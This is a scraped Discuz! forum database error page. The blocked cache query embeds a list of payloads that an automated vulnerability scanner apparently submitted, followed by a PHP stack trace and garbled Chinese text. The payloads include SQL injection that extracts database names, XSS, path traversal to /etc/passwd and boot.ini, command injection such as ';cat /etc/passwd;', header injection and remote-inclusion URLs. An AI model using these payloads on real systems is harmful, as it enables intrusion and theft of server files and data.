Discuz! Database Error

(0) It is not safe to do this query
REPLACE INTO common_cache SET `cachekey`='threadclasscount_49' , `cachevalue`='a:1:{s:6:\"typeid\";a:109:{i:6;s:2:\"19\";i:7;s:2:\"29\";s:2:\"7 \";s:1:\"4\";s:9:\"7 and 3=3\";s:1:\"4\";s:9:\"7 and 3=4\";s:1:\"4\";s:25:\"7\\\\\\\' and \\\\\\\'a\\\\\\\'=\\\\\\\'a\";s:1:\"4\";s:25:\"7\\\\\\\' and \\\\\\\'a\\\\\\\'=\\\\\\\'b\";s:1:\"4\";s:33:\"7%\\\\\\\' and 3=3 and \\\\\\\'%\\\\\\\'=\\\\\\\'\";s:1:\"4\";s:236:\"7 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";s:1:\"4\";s:252:\"7\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\\\\\'1\\\\\\\'=\\\\\\\'1\";s:1:\"4\";s:252:\"7%\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\\\\\'%\\\\\\\'=\\\\\\\'\";s:1:\"4\";s:47:\"7+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:1:\"4\";s:5:\"7\\\\\\\'\";s:1:\"4\";s:4:\"7%27\";s:1:\"4\";s:8:\"7\\\\0\\\\\\\'\";s:1:\"4\";s:9:\"7\\\\\\\\\\\\\\\'\";s:1:\"4\";s:5:\"7JyI=\";s:1:\"4\";s:6:\"7¿\\\\\\'\";s:1:\"4\";s:2:\"7/\";s:1:\"4\";s:2:\"6 \";s:2:\"18\";s:9:\"6 and 3=3\";s:2:\"18\";s:9:\"6 and 3=4\";s:2:\"18\";s:25:\"6\\\\\\\' and \\\\\\\'a\\\\\\\'=\\\\\\\'a\";s:2:\"18\";s:25:\"6\\\\\\\' and \\\\\\\'a\\\\\\\'=\\\\\\\'b\";s:2:\"18\";s:33:\"6%\\\\\\\' and 3=3 and \\\\\\\'%\\\\\\\'=\\\\\\\'\";s:2:\"18\";s:236:\"6 and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1\";s:2:\"18\";s:252:\"6\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\\\\\'1\\\\\\\'=\\\\\\\'1\";s:2:\"18\";s:252:\"6%\\\\\\\' and(select 1 from(select count(*),concat((select (select concat(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and \\\\\\\'%\\\\\\\'=\\\\\\\'\";s:2:\"18\";s:47:\"6+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:2:\"18\";s:5:\"6\\\\\\\'\";s:2:\"18\";s:4:\"6%27\";s:2:\"18\";s:8:\"6\\\\0\\\\\\\'\";s:2:\"18\";s:9:\"6\\\\\\\\\\\\\\\'\";s:2:\"18\";s:5:\"6JyI=\";s:2:\"23\";s:6:\"6¿\\\\\\'\";s:2:\"18\";s:2:\"6/\";s:2:\"23\";s:26:\"http://120.26.55.211/s.txt\";s:1:\"1\";s:26:\"a_long_name_file_not_exist\";s:1:\"1\";s:11:\"/etc/passwd\";s:1:\"1\";s:19:\"c://windows/win.ini\";s:1:\"1\";s:34:\"../../../../../../../../etc/passwd\";s:1:\"1\";s:39:\"../../../../../../../../windows/win.ini\";s:1:\"1\";s:43:\"../../../../../../../../../../etc/passwd%00\";s:1:\"1\";s:47:\"../../../../../../../../../../windows/win.ini00\";s:1:\"1\";s:40:\"../../../../../../../../etc/passwd\\0.jpg\";s:1:\"1\";s:45:\"../../../../../../../../windows/win.ini\\0.jpg\";s:1:\"1\";s:39:\"../../../../../../../../etc/passwd\n.jpg\";s:1:\"1\";s:44:\"../../../../../../../../windows/win.ini\n.jpg\";s:1:\"1\";s:12:\"6/xmlrpc.php\";s:2:\"23\";s:3:\"6[]\";s:2:\"23\";s:12:\"6¨¤\\0xa7¨¤¡é\";s:2:\"23\";s:32:\"../../../../../../../../boot.ini\";s:1:\"1\";s:56:\"À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini\";s:1:\"1\";s:38:\"../../../../../../../../boot.ini\\0.jpg\";s:1:\"1\";s:39:\"../../../../../../../../boot.ini\\0.html\";s:1:\"1\";s:51:\"/.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./boot.ini\";s:1:\"1\";s:12:\"C:\\\\boot.ini\";s:1:\"1\";s:40:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\";s:1:\"1\";s:64:\"../..//../..//../..//../..//../..//../..//../..//../..//boot.ini\";s:1:\"1\";s:80:\"../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././boot.ini\";s:1:\"1\";s:40:\"..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini\";s:1:\"1\";s:41:\"|..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\";s:1:\"1\";s:38:\"../../../../../../../../boot.ini\\0.htm\";s:1:\"1\";s:38:\"../../../../../../../../boot.ini\\0.txt\";s:1:\"1\";s:19:\"file:///c:/boot.ini\";s:1:\"1\";s:30:\"................windowswin.ini\";s:1:\"1\";s:36:\"../../../../../../../../etc/passwd\\0\";s:1:\"1\";s:36:\"\\0../../../../../../../../etc/passwd\";s:1:\"1\";s:41:\"../../../../../../../../etc/passwd\\0.html\";s:1:\"1\";s:52:\".\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./etc/passwd\";s:1:\"1\";s:25:\"/./././././././etc/passwd\";s:1:\"1\";s:42:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\etc/passwd\";s:1:\"1\";s:82:\"../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd\";s:1:\"1\";s:42:\"..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯etc/passwd\";s:1:\"1\";s:35:\"|../../../../../../../../etc/passwd\";s:1:\"1\";s:59:\"À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯/etc/passwd\";s:1:\"1\";s:18:\"file:///etc/passwd\";s:1:\"1\";s:66:\"../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd\";s:1:\"1\";s:40:\"../../../../../../../../../../etc/passwd\";s:1:\"1\";s:42:\"../../../../../../../../../../etc/passwd\\0\";s:1:\"1\";s:58:\"..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd\";s:1:\"1\";s:42:\".../.../.../.../.../.../.../.../etc/passwd\";s:1:\"1\";s:43:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/etc/passwd\";s:1:\"1\";s:26:\"................etc/passwd\";s:1:\"1\";s:43:\"..Áœ..Áœ..Áœ..Áœ..Áœ..Áœ..Áœ..Áœ/etc/passwd\";s:1:\"1\";s:70:\"http://some-inexistent-website.com/some_inexistent_file_with_long_name\";s:1:\"1\";s:36:\"/some_inexistent_file_with_long_name\";s:1:\"1\";s:44:\"\r\n SomeCustomInjectedHeader:injected_by_test\";s:1:\"1\";s:43:\"\n SomeCustomInjectedHeader:injected_by_test\";s:1:\"1\";s:3:\"dir\";s:1:\"1\";s:25:\"http://oxoxoxoxoxoxox.com\";s:1:\"1\";s:18:\"oxoxoxoxoxoxox.com\";s:1:\"1\";s:7:\"phpinfo\";s:1:\"1\";s:29:\"http://hitBAo6EKQnyr.bxss.me/\";s:1:\"1\";s:29:\"http://hitd0rQGQge8t.bxss.me/\";s:1:\"1\";s:36:\"http://testasp.vulnweb.com/t/fit.txt\";s:1:\"1\";s:7:\"set|set\";s:1:\"1\";s:17:\";cat /etc/passwd;\";s:1:\"1\";s:21:\"`ping -c 5 127.0.0.1`\";s:1:\"1\";s:21:\"|ping -n 5 127.0.0.1|\";s:1:\"1\";s:20:\"|ping -c 4 127.0.0.1\";s:1:\"1\";s:34:\"../../../../../../../../boot.ini\\0\";s:1:\"1\";s:36:\"PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\";s:1:\"2\";s:32:\"amF2YXNjcmlwdDpwcm9tcHQoMTExKTt4\";s:1:\"2\";s:22:\"${7387324923+57832091}\";s:1:\"1\";s:3:\"6-0\";s:2:\"23\";s:3:\"6s3\";s:2:\"23\";s:17:\"6 order by 1 -- ;\";s:2:\"23\";s:19:\"6 order by 999 -- ;\";s:2:\"23\";}}'

PHP Debug

No.FileLineCode
1forum.php67require(%s)
2source/module/forum/forum_forumdisplay.php544threadclasscount()
3source/function/function_forumlist.php410discuz_table->insert()
4source/class/discuz/discuz_table.php81discuz_database::insert()
5source/class/discuz/discuz_database.php60discuz_database::query()
6source/class/discuz/discuz_database.php140discuz_database::checkquery()
7source/class/discuz/discuz_database.php177discuz_database_safecheck::checkquery()
8source/class/discuz/discuz_database.php368break()
bbs.masterchat.cn ÒѾ­½«´Ë³ö´íÐÅÏ¢Ïêϸ¼Ç¼, Óɴ˸øÄú´øÀ´µÄ·ÃÎʲ»±ãÎÒÃÇÉî¸ÐǸÒâ.